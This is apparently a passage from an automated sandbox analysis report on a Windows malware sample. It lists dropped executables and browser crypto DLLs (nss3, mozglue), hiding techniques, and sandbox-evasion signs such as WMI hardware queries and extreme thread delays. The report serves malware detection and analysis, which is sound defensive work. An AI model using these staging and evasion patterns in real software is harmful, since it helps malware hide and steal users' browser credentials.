                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B536 push ecx; ret 2_2_6C77B549
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A45 push edx; ret 4_2_00412A94
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0041264E push ebx; ret 4_2_0041266C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E53 push ecx; ret 4_2_00412E54
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E55 push es; iretd 4_2_00412E62
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412C5B push edx; ret 4_2_00412C5C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E63 push ebx; ret 4_2_00412E6C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0041266D push es; ret 4_2_0041267A
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E6D push edx; ret 4_2_00412E78
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E7E push edx; ret 4_2_00412E80
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A01 push edx; ret 4_2_00412A14
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412609 push edi; ret 4_2_00412614
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412C09 push ebx; ret 4_2_00412C1C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412615 push edx; ret 4_2_0041262C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A1A push edx; ret 4_2_00412A1C
                            Source: fak.7.drStatic PE information: section name: .text entropy: 6.816878789485625
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\nss3.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\mozglue.dll
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\msvcp140.dll
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\freebl3.dll
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\vcruntime140.dll
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ypbquxnwo
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\fak
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\softokn3.dll
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FAK
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YPBQUXNWO
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-58469
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1790000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 32C0000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 17E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 13E35970000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 13E4F560000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1060000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B20000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3564
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6052
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4757
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 4907
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5113
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4473
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-45181
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ypbquxnwo
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fak
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeAPI coverage: 8.5 %
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -420000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53874s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59890s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -57608s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59781s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -59111s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5420Thread sleep time: -59671s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -44011s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -47282s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -32657s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -55485s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -43046s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53111s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -39048s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -46051s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -51437s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6300Thread sleep time: -480000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -34940s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48880s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -32908s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -49361s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -30362s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -42157s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -59306s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -47638s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48814s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -40775s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -55633s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -52352s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -56019s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -33590s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -40863s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -53974s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -33780s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -48195s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4112Thread sleep time: -42226s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 2920Thread sleep time: -29514790517935264s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6508Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep count: 45 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -41505174165846465s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -60000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -37752s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -59888s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5316Thread sleep count: 5113 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -36076s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5316Thread sleep count: 4473 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3712Thread sleep time: -59777s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -43255s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -36426s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -48677s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49214s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -46805s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -59171s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -49003s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -50551s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -51632s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -30288s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1964Thread sleep time: -40188s >= -30000s
